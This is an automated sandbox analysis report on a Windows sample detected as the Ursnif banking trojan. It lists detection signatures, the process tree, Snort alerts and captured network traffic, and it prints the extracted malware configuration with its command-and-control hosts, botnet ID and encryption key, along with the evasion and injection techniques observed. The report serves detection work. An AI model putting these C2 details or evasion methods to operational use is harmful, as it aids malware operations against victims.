Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OojqjHGE0W.exe

Overview

General Information

Sample Name:OojqjHGE0W.exe
Analysis ID:630152
MD5:4ed3fa33609a51baf209a5954bef6633
SHA1:aff82f0554f18c780561d6b8b1ca5a1001e42512
SHA256:988177454fe3a5ba8fcdf7f3124e2c56f312b776542d3763540c254df6fe6f76
Tags:exesigned
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Snort IDS alert for network traffic
Writes to foreign memory regions
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Found API chain indicative of debugger detection
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • OojqjHGE0W.exe (PID: 3408 cmdline: "C:\Users\user\Desktop\OojqjHGE0W.exe" MD5: 4ED3FA33609A51BAF209A5954BEF6633)
    • InstallUtil.exe (PID: 5584 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "S0cXgkczLn8DzpFkqJkBMx5geC7yniHR4ECyGeVYDO5jsqYVdXE2v679nj0L+4Im3j/P6z1P+Yt1BRosNI7Edvd1U5N0OYNwNVRfWwfbhm6jaX9Kjt9vEFS5dCsKX71jt2XzO+H4zoaN0nbuxJko5Np4J7p0zDkJiLw6HxWp4zGiWIwT2o7vLE3guRMwyRVXO9dkUDWYMn+gWBAKovUuxnaDZD7PIJ/H8zTx3Yz7628+O4pRw2KlIh0/fkIzdLb08ciTd+kW2cM+z/W40SWfyGxExAOJ7AMei6jzcKc68f1Bamsf4QGIbKQz9UqHR5cBlCKpLVi3hYeembcW9ep7oVhTb5Y2TC0ZAzzb/feTdhI=", "c2_domain": ["anm.msn.com", "194.76.225.45", "msi.msn.com", "194.76.225.56"], "botnet": "1700", "server": "50", "serpent_key": "1OoXFPbINCQ6HCAa", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    0000000A.00000003.501961576.00000000020C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      0000000A.00000003.502032730.00000000020C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000000A.00000003.501571456.00000000020C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.InstallUtil.exe.1b694a0.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              10.2.InstallUtil.exe.1340000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                10.2.InstallUtil.exe.1b694a0.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.2.352.169.118.17349702802033203 05/19/22-14:41:40.292996
                  SID:2033203
                  Source Port:49702
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.352.169.118.17349702802033204 05/19/22-14:41:40.292996
                  SID:2033204
                  Source Port:49702
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 10.2.InstallUtil.exe.1b694a0.2.raw.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "S0cXgkczLn8DzpFkqJkBMx5geC7yniHR4ECyGeVYDO5jsqYVdXE2v679nj0L+4Im3j/P6z1P+Yt1BRosNI7Edvd1U5N0OYNwNVRfWwfbhm6jaX9Kjt9vEFS5dCsKX71jt2XzO+H4zoaN0nbuxJko5Np4J7p0zDkJiLw6HxWp4zGiWIwT2o7vLE3guRMwyRVXO9dkUDWYMn+gWBAKovUuxnaDZD7PIJ/H8zTx3Yz7628+O4pRw2KlIh0/fkIzdLb08ciTd+kW2cM+z/W40SWfyGxExAOJ7AMei6jzcKc68f1Bamsf4QGIbKQz9UqHR5cBlCKpLVi3hYeembcW9ep7oVhTb5Y2TC0ZAzzb/feTdhI=", "c2_domain": ["anm.msn.com", "194.76.225.45", "msi.msn.com", "194.76.225.56"], "botnet": "1700", "server": "50", "serpent_key": "1OoXFPbINCQ6HCAa", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
                  Multi AV Scanner detection for submitted file
                  Source: OojqjHGE0W.exeReversingLabs: Detection: 46%
                  Machine Learning detection for sample
                  Source: OojqjHGE0W.exeJoe Sandbox ML: detected
                  Source: 10.2.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                  Source: 0.2.OojqjHGE0W.exe.8b5230.0.unpackAvira: Label: TR/Patched.Ren.Gen
                  Source: 10.0.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                  Source: 10.0.InstallUtil.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                  Source: 0.3.OojqjHGE0W.exe.2580000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                  Source: 0.3.OojqjHGE0W.exe.8b5230.2.unpackAvira: Label: TR/Patched.Ren.Gen
                  Source: 0.3.OojqjHGE0W.exe.2580000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                  Source: OojqjHGE0W.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: OojqjHGE0W.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdb source: OojqjHGE0W.exe
                  Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdbP; source: OojqjHGE0W.exe, 00000000.00000000.267737292.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, OojqjHGE0W.exe, 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp
                  Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdbP;Q source: OojqjHGE0W.exe

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49702 -> 52.169.118.173:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49702 -> 52.169.118.173:80
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.com
                  Source: global trafficHTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgyMDA5NjkwMDQ5NzI5NzksIlZlcnNpb24iOjF90; marketPref=de-ch
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="http://www.bing.com" /><link rel="preconnect" href="//browser.events.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="http://www.bing.com" /><link rel="dns-prefetch" href="//browser.events.data.msn.com" /><link rel="canonical" href="http://www.msn.com/de-ch/" /> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 79em)",size3column:"(min-width: 58.875em) and (max-width: 78.99em)",size2column:"(min-width: 43.75em) and (max-width: 58.865em)",size2rowsize4column:"(min-width: 79em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 58.875em) and (max-width: 78.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 58.865em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 79em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 58.875em) and (max-width: 78.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 58.865em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="http://www.msn.com/de-ch"/><meta property="og:url" content="http://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="http://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick{di
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                  Source: OojqjHGE0W.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
                  Source: OojqjHGE0W.exeString found in binary or memory: http://s.symcd.com06
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/d7cb56b9-/direction=ltr.l
                  Source: InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/d7cb56b9-/direction=ltr.lo
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAXt9ve.img?h=368&amp;w
                  Source: OojqjHGE0W.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                  Source: OojqjHGE0W.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                  Source: OojqjHGE0W.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&amp;anoncknm=%22%22&amp;name=%22M
                  Source: InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.hoergeraete.hoeren-heute.ch/horizon_reveal/?act=ACT0000040013ACT&amp;utm_source=mcrs&amp
                  Source: OojqjHGE0W.exeString found in binary or memory: https://d.symcb.com/cps0%
                  Source: OojqjHGE0W.exeString found in binary or memory: https://d.symcb.com/rpa0
                  Source: OojqjHGE0W.exeString found in binary or memory: https://d.symcb.com/rpa0.
                  Source: InstallUtil.exe, 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58b8&amp;bhid=62470ee6adad76040858398f&a
                  Source: InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58ba&amp;bhid=6203eb0e7db0ad17f44b22d8&a
                  Source: InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1652964100&amp;rver=7.0.6730.0&am
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/logout.srf?ct=1652964101&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1652964100&amp;rver=7.0.6730.0&amp;w
                  Source: InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com/
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/autofahrer-38-rast-mit-94-km-h-durch-30er-zone/ar-AAXsnwd?ocid=
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/fremdes-b%c3%bcsi-gef%c3%bcttert-frau-soll-1250-franken-strafe-
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/olivia-und-noah-sind-die-beliebtesten-baby-vornamen-in-z%c3%bcr
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/polizei-nimmt-baukran-kletterer-fest/ar-AAXq550?ocid=hplocalnew
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/stadtrat-handelt-in-z%c3%bcrich-west-mehr-preisg%c3%bcnstige-wo
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/weniger-verbindungen-zwischen-z%c3%bcrich-und-bern-daf%c3%bcr-m
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/z%c3%bcrcher-kantonsrat-pr%c3%bcft-nach-igelkot-vorfall-sicherh
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/shopping
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/sport/other/der-fcz-verabschiedet-sich-von-doumbia-und-ceesay/ar-AAXsezM?o
                  Source: unknownDNS traffic detected: queries for: anm.msn.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.com
                  Source: global trafficHTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgyMDA5NjkwMDQ5NzI5NzksIlZlcnNpb24iOjF90; marketPref=de-ch

